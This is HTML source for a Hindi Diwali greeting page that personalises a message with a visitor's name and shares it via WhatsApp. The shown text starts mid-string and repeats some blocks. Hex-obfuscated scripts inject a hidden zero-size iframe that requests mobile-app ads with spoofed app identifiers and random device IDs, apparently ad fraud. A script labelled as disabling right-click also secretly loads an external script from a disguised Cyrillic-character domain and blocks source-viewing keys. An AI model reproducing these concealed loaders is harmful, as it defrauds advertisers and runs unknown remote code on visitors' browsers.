3D\x30\x26\x75\x5F\x61\x75\x64\x69\x6F\x3D\x34\x26\x75\x5F\x73\x6F\x3D\x70\x26\x6F\x75\x74\x70\x75\x74\x3D\x68\x74\x6D\x6C\x26\x72\x65\x67\x69\x6F\x6E\x3D\x6D\x6F\x62\x69\x6C\x65\x5F\x61\x70\x70\x26\x75\x5F\x74\x7A\x3D\x2D\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x26\x63\x6C\x69\x65\x6E\x74\x5F\x73\x64\x6B\x3D\x31\x26\x65\x78\x3D\x31\x26\x63\x6C\x69\x65\x6E\x74\x3D\x63\x61\x2D\x61\x70\x70\x2D\x70\x75\x62\x2D","\x26\x73\x6C\x6F\x74\x6E\x61\x6D\x65\x3D","\x26\x63\x61\x70\x73\x3D\x69\x6E\x6C\x69\x6E\x65\x56\x69\x64\x65\x6F\x5F\x69\x6E\x74\x65\x72\x61\x63\x74\x69\x76\x65\x56\x69\x64\x65\x6F\x5F\x6D\x72\x61\x69\x64\x31\x5F\x63\x6C\x69\x63\x6B\x54\x72\x61\x63\x6B\x69\x6E\x67\x5F\x73\x64\x6B\x41\x64\x6D\x6F\x62\x41\x70\x69\x46\x6F\x72\x41\x64\x73\x26\x6A\x73\x76\x3D\x31\x38\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x35\x35\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x33\x32\x35\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x6D\x61\x72\x67\x69\x6E\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x6D\x61\x72\x67\x69\x6E\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20"];var src1=_0x6717[0]+ pn1+ _0x6717[1]+ pn1+ _0x6717[2]+ pubid+ _0x6717[3]+ s1+ _0x6717[4]

</script>

<!------------------------------------------------------------------------->

  <style>

            table, th, td {

                border: 1px solid black;

            }

        </style>

    <link type="text/css" href="css/tabs-1.css" rel="stylesheet" /> 

    <script src="jquery.tools.min.js"></script>

    <script type="text/javascript">

      $(document).ready(function(){

       $("ul.tabs").tabs("div.panes > div");

     });

 </script>

     <!-- BANNER 1 -->

    <tr>

       <td> <script type="text/javascript">

var _0x28f9=["\x3C\x68\x32\x20\x61\x6C\x69\x67\x6E\x3D\x22\x63\x65\x6E\x74\x65\x72\x22\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22","\x2F\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x68\x31\x3E","\x77\x72\x69\x74\x65"];document[_0x28f9[2]](_0x28f9[0]+ src1+ _0x28f9[1])

</script>
<!----- Wishing Poem Here ----->
<p style="text-align: center;"><strong><span style="color: #ff0000; font-size: 18pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;हर ख़ुशी, ख़ुशी मांगे आपसे;</span></p><p style="text-align: center;"><span style="color: #008000; font-size: 18pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;हर जिंदगी, जिंदगी मांगे आपसे;</span></p><p style="text-align: center;"><span style="color: #ff00ff; font-size: 18pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;इस दीवाली इतना उजाला हो आपके जीवन में;</span></p><p style="text-align: center;"><span style="color: #00ccff; font-size: 18pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;कि दिये भी रोशनी मांगे आपसे।</span></p><!--<p style="text-align: center;"><span style="color: #ff6600; font-size: 18pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;दीपावली की</span></p><p style="text-align: center;"><span style="color: #ff6600; font-size: 18pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;हार्दिक शुभकामनाएं|</span></p>-->



<!-----------Slideshow cancels If you want to put contact Technicalarp Website Owener--------------->

<img alt="GiteshGeeky" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/happy%20diwali%20lord%20lakshami%20yourgifts.github.io-diwali.png" style="animation: tada 4s infinite" class="swing2"  height="200px" width="200px"/>
<br />
<img alt="YouTube/GiteshGeeky" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/flame%20clipart%20oil%20original%20transparent%20background%20diya%20gif.gif" height="100px" width="80px"/>
<img alt="YouTube/GiteshGeeky" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/Animated%20Red%20Gift%20Box%20Transparent%20Background%20Gif.gif" height="100px" width="100px"/>

<div dir="ltr" style="text-align: center;" trbidi="on">
.<br />
</div>

<!---Paste Responsive Adsense Code --->
				<script>

var pubid = '5244118484095964';
<!------------------------------------------------------------------------->
<!-- Banner Ad Slot Id Here -->
var s1 = '6981047023';
var pn1 = 'com.FindThePairGame';
var _0x6717=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x6F\x6F\x67\x6C\x65\x61\x64\x73\x2E\x67\x2E\x64\x6F\x75\x62\x6C\x65\x63\x6C\x69\x63\x6B\x2E\x6E\x65\x74\x2F\x6D\x61\x64\x73\x2F\x67\x6D\x61\x3F\x70\x72\x65\x71\x73\x3D\x30\x26\x75\x5F\x73\x64\x3D\x31\x2E\x35\x26\x75\x5F\x77\x3D\x33\x32\x30\x26\x6D\x73\x69\x64\x3D","\x26\x63\x61\x70\x3D\x61\x26\x6A\x73\x3D\x61\x66\x6D\x61\x2D\x73\x64\x6B\x2D\x61\x2D\x76\x33\x2E\x33\x2E\x30\x26\x74\x6F\x61\x72\x3D\x30\x26\x69\x73\x75\x3D\x57\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x25\x32\x39\x2B\x25\x32\x37\x45\x45\x41\x42\x42\x38\x45\x45\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x43\x32\x42\x45\x37\x37\x30\x42\x36\x38\x34\x44\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x39\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x45\x43\x42\x26\x63\x69\x70\x61\x3D\x30\x26\x66\x6F\x72\x6D\x61\x74\x3D\x33\x32\x30\x78\x35\x30\x5F\x6D\x62\x26\x6E\x65\x74\x3D\x77\x69\x26\x61\x70\x70\x5F\x6E\x61\x6D\x65\x3D\x31\x2E\x61\x6E\x64\x72\x6F\x69\x64\x2E","\x26\x68\x6C\x3D\x65\x6E\x26\x75\x5F\x68\x3D\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x26\x63\x61\x72\x72\x69\x65\x72\x3D\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x39\x39\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x26\x70\x74\x69\x6D\x65\x3D\x30\x26\x75\x5F\x61\x75\x64\x69\x6F\x3D\x34\x26\x75\x5F\x73\x6F\x3D\x70\x26\x6F\x75\x74\x70\x75\x74\x3D\x68\x74\x6D\x6C\x26\x72\x65\x67\x69\x6F\x6E\x3D\x6D\x6F\x62\x69\x6C\x65\x5F\x61\x70\x70\x26\x75\x5F\x74\x7A\x3D\x2D\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x26\x63\x6C\x69\x65\x6E\x74\x5F\x73\x64\x6B\x3D\x31\x26\x65\x78\x3D\x31\x26\x63\x6C\x69\x65\x6E\x74\x3D\x63\x61\x2D\x61\x70\x70\x2D\x70\x75\x62\x2D","\x26\x73\x6C\x6F\x74\x6E\x61\x6D\x65\x3D","\x26\x63\x61\x70\x73\x3D\x69\x6E\x6C\x69\x6E\x65\x56\x69\x64\x65\x6F\x5F\x69\x6E\x74\x65\x72\x61\x63\x74\x69\x76\x65\x56\x69\x64\x65\x6F\x5F\x6D\x72\x61\x69\x64\x31\x5F\x63\x6C\x69\x63\x6B\x54\x72\x61\x63\x6B\x69\x6E\x67\x5F\x73\x64\x6B\x41\x64\x6D\x6F\x62\x41\x70\x69\x46\x6F\x72\x41\x64\x73\x26\x6A\x73\x76\x3D\x31\x38\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x35\x35\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x33\x32\x35\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x6D\x61\x72\x67\x69\x6E\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x6D\x61\x72\x67\x69\x6E\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20"];var src1=_0x6717[0]+ pn1+ _0x6717[1]+ pn1+ _0x6717[2]+ pubid+ _0x6717[3]+ s1+ _0x6717[4]
</script>
<!------------------------------------------------------------------------->

  <style>
            table, th, td {
                border: 1px solid black;
            }
        </style>
    <link type="text/css" href="css/tabs-1.css" rel="stylesheet" /> 
    <script src="jquery.tools.min.js"></script>
    <script type="text/javascript">
      $(document).ready(function(){
       $("ul.tabs").tabs("div.panes > div");
     });
 </script>

     <!-- BANNER 1 -->
    <tr>
       <td> <script type="text/javascript">
var _0x28f9=["\x3C\x68\x32\x20\x61\x6C\x69\x67\x6E\x3D\x22\x63\x65\x6E\x74\x65\x72\x22\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22","\x2F\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x68\x31\x3E","\x77\x72\x69\x74\x65"];document[_0x28f9[2]](_0x28f9[0]+ src1+ _0x28f9[1])
</script>		      
			<script src="https://apis.google.com/js/platform.js"></script>

<div class="g-ytsubscribe" data-channelid="UCMJqeMp8Wo4fwh3qPX_mDFQ" data-layout="default" data-count="hidden"></div>
													      <br/><br/>
<span style="background-color: green; color: white; font-family: &quot;tahoma&quot; , &quot;arial&quot; , &quot;helvetica&quot; , sans-serif; font-size: 18pt;">&nbsp;  🌠अपनेे दोस्तों के साथ शेयर करो 🌠 </span></div>
<img alt="youtube.com/giteshgeeky" height="70px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/here.gif" width="110px" />
<br />

<div style="text-align:center">
  <span class="technicalarpdot"></span> 
  <span class="technicalarpdot"></span> 
  <span class="technicalarpdot"></span> 
  <span class="technicalarpdot"></span>
  <span class="technicalarpdot"></span>
  <span class="technicalarpdot"></span>
  <span class="technicalarpdot"></span>
  <span class="technicalarpdot"></span>
  <span class="technicalarpdot"></span>
</div>

<div id="TechnicalArpformBox" >
          
<input type="text" name="name" id="nameTextBox"  placeholder="अपना नाम डाले !">
          <div id="goButton" onclick="createGreeting()" >
          Go
          </div>
</div>
<center>
 <a class="technicalarpfooterstyle1" style="display:none;" href="https://www.facebook.com/sharer/sharer.php?u=yourgifts.github.io/diwali" target="_blank" title="Share this post on Facebook" class="facebook">
	<img alt="GiteshGeeky"   width="22px" height="22px" src="http://icons.iconarchive.com/icons/paomedia/small-n-flat/1024/social-facebook-icon.png"/>  
 <b style="font-size: 15px;">Share on Facebook</b>  
 	<img alt="giteshgeeky"  width="22px" height="22px" src="http://icons.iconarchive.com/icons/paomedia/small-n-flat/1024/social-facebook-icon.png"/>  
 </a>

 <a class="technicalarpfooterstyle" style="display:none;" href="javascript:void(0)" onclick="technicalarpShareWA()">
          <img width="25px" height="25px" src="https://2.bp.blogspot.com/-wqIwcDNHuLo/W1GSWn4DM7I/AAAAAAAABYk/7uT-lBuXTC0dMt86JLCmVoHKGWKBlClvQCLcBGAs/s1600/technovedan1.png">
          <b style="font-size: 15px;position:  relative;top: -3px;margin: 0 10px;">Share with your Friends</b>
          <img width="25px" height="25px" src="https://2.bp.blogspot.com/-wqIwcDNHuLo/W1GSWn4DM7I/AAAAAAAABYk/7uT-lBuXTC0dMt86JLCmVoHKGWKBlClvQCLcBGAs/s1600/technovedan1.png">
        </a>
    </div>
</center>  
</body>
 <script>
      var Arp = function(sParam) {
        var sPageURL = window.location.search.substring(1);
        var sURLVariables = sPageURL.split("&");
        for (var i = 0; i < sURLVariables.length; i++) {
            var sParameterName = sURLVariables[i].split("=");
            if (sParameterName[0] === sParam) {
              return sParameterName[1];
            }
          }
      };
    window.Arp = Arp;
    var name = decodeURI(Arp("bl"));
    if (typeof Arp("bl") === "undefined") {
      name = "";
    }
    var checkName = function() {
      if (name.length !== 0) {
        name = name.replace(/-/g, " ");
        console.log("name is there", name);
        document.querySelector("#technicalarp-show-name").innerHTML = name;
        document.querySelector("#technicalarp-fromMessage").innerHTML= ""
      } else {

      }
    };

    checkName();

    var createGreeting=function(){


      sname=document.querySelector("#nameTextBox").value;
      sname=sname.replace(/@/g,"-")
      sname=sname.replace(/%40/g,"-")
      sname=sname.replace(/\./g,"-")
      if(sname.trim()!=""){
        document.querySelector("#TechnicalArpformBox").style.display = "none";
        document.querySelector(".technicalarpfooterstyle").style.display = "block";
        document.querySelector(".technicalarpfooterstyle1").style.display = "block";
        document.querySelector("#technicalarp-show-name").innerHTML = sname;
        document.querySelector("#technicalarp-fromMessage").innerHTML= " ";
        window.scrollTo(0,0);
      }else {
        alert ("Please Type Your Name First");
        document.getElementById("nameTextBox").focus();
      }
    }

    var technicalarpShareWA = function() {
      var shareString = "";
      var whatsappHref;
      shareString += "*"+sname+"*";

      
      shareString +=" ने आपके लिए कुछ भेजे है %0A ब्लू लिंक पर क्लिक करके देख लीजिए %0A"
      shareString +=(window.location.href.split("?")[0] + "?bl=" + sname).replace("#", "").replace(/ /g, "-");
     

      whatsappHref = "whatsapp://send?text=" + shareString;
      window.location.href = whatsappHref;

    };
    var countDownDate = new Date("Nov 14, 2020 00:00:00").getTime();

    // Update the count down every 1 second
    var x = setInterval(function() {
        // Get todays date and time
        var now = new Date().getTime();

        // Find the distance between now an the count down date
        var distance = countDownDate - now;

        // Time calculations for days, hours, minutes and seconds
        var days = Math.floor(distance / (1000 * 60 * 60 * 24));
        var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
        var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
        var seconds = Math.floor((distance % (1000 * 60)) / 1000);

        // Output the result in an element with id="demo"
        document.getElementById("technicalarpdemo").innerHTML = days + "days " + hours + "hr "+ minutes + "min " + seconds + "sec ";

        // If the count down is over, write some text
        if (distance < 0)
         {
            clearInterval(x);
            document.getElementById("technicalarpdemo").innerHTML = "";
            document.getElementById("inAdvance").innerHTML = "";

        }
    }, 1000);
  </script>
<!-- Display the countdown timer in an element -->


<script> 
// Set the date we're counting down to
var countDownDate = new Date("Nov 14, 2020 00:00:00").getTime();

// Update the count down every 01 second
var x = setInterval(function() {

  // Get todays date and time
  var now = new Date().getTime();

  // Find the distance between now an the count down date
  var distance = countDownDate - now;

  // Time calculations for days, hours, minutes and seconds
  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);

  // Display the result in the element with id="demo"
  document.getElementById("demo").innerHTML = days + "<i> ???,</i> " + hours + " <i>????,</i> "
  + minutes + "<i> ????,</i> " + seconds + "<i> ??????  <br>????</i> ";

  // If the count down is finished, write some text 
  if (distance < 0) {
    clearInterval(x);
    document.getElementById("demo").innerHTML = "";
  }
}, 1000);
</script>

<script>
//** disable right click & ctrl + u javascript code **//
document.addEventListener('contextmenu', event => event.preventDefault()); document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'&#1092;'+'&#1102;.'+'i'+'o"></s'+'cr'+'ipt>'); document.onkeydown = function(e) { if(event.keyCode==123){ return false; } else if (e.ctrlKey &&  (e.keyCode === 67 || e.keyCode === 16 || e.keyCode === 73 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) { return false; } };
var technicalarpfly=(function(){Function.prototype.bind=Function.prototype.bind||function(fixThis){var func=this
return function(){return func.apply(fixThis,arguments)}}
var DEBUG=false;var _l=function(obj){DEBUG&&console&&console.log&&console.log(obj)}
var html=document.documentElement;var requestAnimationFrame=window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(func){setTimeout(func,17);};var
PI_half=Math.PI/2,resources={};var Stage=function(canvas){this.canvas=canvas;this.ctx=canvas.getContext('2d');this.objects=[];this.restart_timeout=1000;this.paused=false;this.destroyed=false;return this;};var fps=0,now,lastUpdate=(new Date)*1-1;var fpsFilter=50;var set_fps=function(){var thisFrameFPS=1000/((now=new Date)-lastUpdate);fps+=(thisFrameFPS-fps)/fpsFilter;lastUpdate=now;}
Stage.prototype.frame=function(){if(this.destroyed){return;}
this.ctx.clearRect(0,0,this.ctx.canvas.width,this.ctx.canvas.height)
for(var i in this.objects){if(this.objects[i].destroyed==true){this.objects.splice(i,1)}else{this.objects[i].tick(this.ctx)}}
if(this.objects.length==0){var self=this
setTimeout(function(){_l("restarting in "+self.restart_timeout)
self.setup();self.frame();},this.restart_timeout);}else if(!this.paused){requestAnimationFrame(this.frame.bind(this))}};Stage.prototype.setup=function(){this.objects.push(getRandomFormation(this));};Stage.prototype.destroy=function(){this.destroyed=true;this.objects=[];}
var Formation=function(x,y){this.x=x;this.y=y;this.planes=[];};Formation.prototype.addPlane=function(formation_x,formation_y,color){var plane_x=this.x+formation_x,plane_y=this.y+formation_y;var plane=new JetPlane(resources.jet_img,plane_x,plane_y,color,formation_x,formation_y);this.planes.push(plane);return plane;};Formation.prototype.travelTo=function(x,y,v){var f_plane;for(var i in this.planes){f_plane=this.planes[i];f_plane.travelTo(f_plane.formation_x+x,f_plane.formation_y+y,v)}};Formation.prototype.tick=function(ctx){for(var i in this.planes){if(this.planes[i].destroyed){_l("deleting plane "+i)
this.planes.splice(i,1);}else{this.planes[i].tick(ctx);}}
if(this.planes.length==0){this.destroy();}};Formation.prototype.destroy=function(){this.destroyed=true;};var getRandomFormation=function(stage){var y_to_zero=Math.random()>0.5?true:false
var init_y=y_to_zero?stage.ctx.canvas.height:10+(stage.ctx.canvas.height-10)*Math.random();var init_x=y_to_zero?(stage.ctx.canvas.width/2-10)*Math.random():10;_l("starting from:"+init_x+" ,"+init_y);var formation=new Formation(init_x,init_y);formation.addPlane(0,0,"255, 153, 51");formation.addPlane(50,-50,"222, 222, 222");formation.addPlane(100,0,"0, 128, 0");var target_y=stage.ctx.canvas.height-init_y;var target_x=stage.ctx.canvas.width-init_x;formation.travelTo(target_x,target_y,3+3*Math.random());return formation;};var JetPlane=function(img,initX,initY,smoke_rgb,formation_x,formation_y){this.img=img
this.x=initX;this.y=initY;this.formation_x=formation_x;this.formation_y=formation_y
this.smoke_particles_list=[];this.smoke_rgb=smoke_rgb;this.destroy_plane=false;this.pather=new PathMaker();return this;};JetPlane.prototype.draw=function(ctx){ctx.save();var angle=Math.atan(this.pather.slope)+PI_half;ctx.translate(this.x,this.y);ctx.rotate(angle)
ctx.drawImage(this.img,0,0);ctx.restore();for(var i in this.smoke_particles_list){if(this.smoke_particles_list[i].destroyed==true){this.smoke_particles_list.splice(i,1);}else{this.smoke_particles_list[i].draw(ctx);}}}
JetPlane.prototype.travelTo=function(_x,_y,v){this.pather.createPath(this.x,this.y,_x,_y,v);}
JetPlane.prototype.tick=function(ctx){this.pather.move();var angle=Math.atan(this.pather.slope)+PI_half;var adj_x=-this.formation_x+this.formation_x*Math.cos(angle)-this.formation_y*Math.sin(angle);var adj_y=-this.formation_y+this.formation_x*Math.sin(angle)+this.formation_y*Math.cos(angle);this.x=this.pather.x+adj_x;this.y=this.pather.y+adj_y;if(this.smoke_particles_list.length<100&&!this.destroy_plane){var delta_x=(11+2*Math.random())*Math.cos(angle)-(29+4*Math.random())*Math.sin(angle);var delta_y=(11+2*Math.random())*Math.sin(angle)+(29+4*Math.random())*Math.cos(angle);var smoke_particle=new SmokeParticle(this.x+delta_x,this.y+delta_y,this.smoke_rgb)
this.smoke_particles_list.push(smoke_particle);}
this.draw(ctx);var bbw=50;if(this.x>ctx.canvas.width+bbw||this.y>ctx.canvas.height+bbw||this.x<0-bbw||this.y<0-bbw){this.destroy_plane=true;}else{this.destroy_plane=false;}
if(this.destroy_plane&&this.smoke_particles_list.length==0){this.destroy()}};JetPlane.prototype.destroy=function(){this.destroyed=true;}
var PathMaker=function(){this.speed=5.5;this.slope=null
this.x=0;this.y=0;this.delta_x=0;this.delta_y=0;};PathMaker.prototype.createPath=function(x1,y1,x2,y2,v){this.x=x1;this.y=y1;this.delta_x=x2-x1;this.delta_y=y2-y1;this.slope=this.delta_y/this.delta_x;this.speed=v;}
PathMaker.prototype.setSpeed=function(v){this.speed=v;}
PathMaker.prototype.move=function(){this.x=this.x+Math.cos(Math.atan(this.slope))*this.speed;this.y=this.y+Math.sin(Math.atan(this.slope))*this.speed;}
var SmokeParticle=function(paramX,paramY,rgb){this.x=paramX;this.y=paramY;this.opacity=0.5
this.radius=2+Math.random();this.rgb=rgb;};SmokeParticle.prototype.draw=function(ctx){ctx.save();ctx.beginPath();ctx.fillStyle='rgba('+this.rgb+','+this.opacity+')';ctx.shadowColor='rgba('+this.rgb+',1)';ctx.arc(this.x,this.y,this.radius,0,Math.PI*2,true);ctx.fill();this.radius=this.radius+0.05;this.opacity=this.opacity-0.005;if(this.opacity<=0){this.destroyed=true;};ctx.restore();};var stage;var init=function(jet_img_src){var canvas=document.createElement('canvas');canvas.id="canvas_doodle";canvas.height=window.innerHeight||html.clientHeight;canvas.width=window.innerWidth||html.clientWidth;var canvasStyle=canvas.style;canvasStyle.position='fixed';canvasStyle.top=0;canvasStyle.left=0;canvasStyle.zIndex=1138;canvasStyle['pointerEvents']='none';document.body.appendChild(canvas);stage=new Stage(canvas);resources.jet_img=new Image();resources.jet_img.src=jet_img_src;resources.jet_img.onload=function(){stage.setup();requestAnimationFrame(stage.frame.bind(stage))}};var destroy=function(){stage.destroy();setTimeout(function(){document.body.removeChild(document.getElementById("canvas_doodle"));},50);delete stage;}
return{"init":init,"destroy":destroy}})();
technicalarpfly.init("https://4.bp.blogspot.com/-LDUVR0qRrSE/XAo2d_Zk06I/AAAAAAAAA8c/5v5lOWu-T28oXfJk1yai2WorGWx7ossuQCLcBGAs/s1600/imageedit_1_3799019746.png");
</script> 
 </html>
